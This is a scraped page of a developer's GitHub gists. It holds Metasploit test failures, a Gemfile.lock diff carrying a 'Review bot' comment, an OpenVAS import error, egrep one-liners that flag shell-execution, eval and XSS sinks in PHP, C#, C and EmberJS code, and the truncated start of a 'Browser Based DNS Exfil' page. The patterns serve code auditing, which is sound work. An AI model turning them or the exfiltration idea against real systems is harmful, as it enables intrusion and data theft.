Nicholas Starke nstarke
ms-rspec-failures
rspec ./spec/lib/msf/util/exe_spec.rb:65 # Msf::Util::EXE.to_executable_fmt with platform=linux returns an executable when given arch=mipsbe, fmt=elf
rspec ./spec/lib/msf/util/exe_spec.rb:65 # Msf::Util::EXE.to_executable_fmt with platform=linux returns an executable when given arch=mipsle, fmt=elf
rspec ./spec/lib/rex/socket/range_walker_spec.rb:29 # with an invalid hostname should not be valid
rspec ./spec/lib/rex/socket/range_walker_spec.rb:34 # with an invalid hostname and CIDR should not be valid
Failure/Error: verify_bin_fingerprint(format_hash, bin)
expected: /ELF 32-bit MSB executable, MIPS/
got: "/dev/stdin: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, corrupted section header size\n" (using =~)
@@ -1,2 +1,2 @@
nstarke / gist:11306563
Last active August 29, 2015 14:00
--- ../Gemfile.lock 2014-04-25 21:35:15.353280736 +0000
+++ Gemfile.lock 2014-04-25 23:05:47.249280736 +0000
@@ -1,27 +1,27 @@
- activemodel (3.2.14)
- activesupport (= 3.2.14)
+ activemodel (3.2.17)
+ activesupport (= 3.2.17)
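Review bot: the hunk header `@@ -1,27 +1,27 @@` declares 27 lines on each side but only the four activemodel/activesupport lines are visible, so most of this lock-file bump from 3.2.14 to 3.2.17 cannot be reviewed from what is shown; before accepting it, confirm that every other Rails 3.2 gem in Gemfile.lock (and the corresponding pin in the Gemfile) moved to 3.2.17 as well, since `activemodel (3.2.17)` requires `activesupport (= 3.2.17)` and a single stale pin elsewhere in the lock will fail bundle resolution.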
nstarke / gist:aabe781c6967a7f03adb
Created January 12, 2015 01:50
msf > openvas_report_import 1 11
[*] Importing report to database.
[-] Error while running command openvas_report_import: getaddrinfo: Name or service not known
Call stack:
/home/nick/metasploit-framework/lib/rex/socket.rb:181:in `gethostbyname'
/home/nick/metasploit-framework/lib/rex/socket.rb:181:in `getaddresses'
/home/nick/metasploit-framework/lib/rex/socket.rb:165:in `getaddress'
/home/nick/metasploit-framework/lib/msf/core/db_manager/host.rb:93:in `normalize_host'
/home/nick/metasploit-framework/lib/msf/core/db_manager/host.rb:160:in `block in report_host'
openvas-report
<report content_type='text/xml' extension='xml' format_id='a994b278-1f62-11e1-96ac-406186ea4fc5' id='7fa042b4-55ee-4ece-a647-7f2288e24b5c' type='scan'><owner><name/></owner><name>2015-01-12T01:24:46Z</name><comment/><creation_time>2015-01-12T01:24:46Z</creation_time><modification_time>2015-01-12T01:32:42Z</modification_time><writable>0</writable><in_use>0</in_use><report id='7fa042b4-55ee-4ece-a647-7f2288e24b5c'><report_format/><sort><field>type<order>descending</order></field></sort><filters id='0'><term>sort-reverse=ROWID result_hosts_only=1 min_cvss_base= levels=hmlgd autofp=0 notes=0 overrides=0 first=1 rows=-1 delta_states=cgns</term>hmlgd<phrase/><autofp>0</autofp><notes>0</notes><overrides>0</overrides><apply_overrides>0</apply_overrides><result_hosts_only>1</result_hosts_only><min_cvss_base/><filter>High</filter><filter>Medium</filter><filter>Low</filter><filter>Log</filter><filter>Debug</filter></filters><severity_class id='d4c74cda-89e1-11e3-9c29-406186ea4fc5'><name>nist</name><full_name>NVD Vulnera
nstarke /
Last active August 29, 2015 14:25
EmberJS one-liner to find unsafe handlebars parameters
# searches for {{{ or }}} in all .handlebars or .hbs files
# {{{ and }}} signify unsafe template parameters in EmberJS
# tested on OS X 10.10
egrep -r --include "*.handlebars" --include "*.hbs" "\{\{\{|\}\}\}" .
nstarke / html5-elements.json
Created August 9, 2015 23:12
List of all HTML5 elements structured in a JSON document
{
  "name": "a",
  "start": "<a>",
  "end": "</a>"
},
{
  "name": "abbr",
  "start": "<abbr>",
  "end": "</abbr>"
}
nstarke /
Last active December 5, 2015 17:39
Egrep commands to find security vulnerabilities and perform security audits on CSharp code. Useful for penetration testers operating in a Microsoft / CSharp environment.
# Returns instances where anti-XSS measures are deployed
egrep -r --include "*.cs" -e "(AntiXssEncoder|Server\.HtmlEncode|Html\.Encode)" .
# Returns possible command injection areas
egrep -r --include "*.cs" -e "(Process|Process\.Start)\(" .
# Returns possible XSS scenarios (string concatenation in HTML/XML)
egrep -r --include "*.cs" -e "<.*>\"\s*\+.*\+\s*\"<.*>" .
# Returns places where anti-CSRF measures are deployed
nstarke /
Created February 27, 2016 18:16
C and C++ Egrep
# see all character arrays of any hardcoded length
# (egrep/ERE has no \d shorthand, so the digit class is spelled out as [0-9];
#  _ is included in the identifier class so names like buf_name are matched too)
egrep --include "*.c*" -rnI -e 'char\s+[a-zA-Z0-9_]+\[[0-9]+\]' .
nstarke /
Last active October 4, 2016 22:15
PHP Vulnerability egrep
# this command searches all PHP files in a directory for vulnerable shell functions
egrep -r --include "*.php" -e "(system|exec|popen|pcntl_exec|proc_open)\(" .
# this command searches all PHP files in a directory for certain vulnerable php execution functions
egrep -r --include "*.php" -e "(eval|assert|preg_replace)\(" .
# this command returns instances where variables are echoed out without htmlspecialchars()
# it can be useful for finding XSS vulnerabilities in PHP code
egrep -r --include "*.php" -e "echo\s*\\$.*;" .
nstarke / bacon-ipsum.html
Last active January 14, 2017 03:48
Browser Based DNS Exfil
<!DOCTYPE html>
<html style="width:100%;height:100%;">
var targetId = Math.round(Math.random() * 1000000);
var sessionId = guid();
function doRequest(){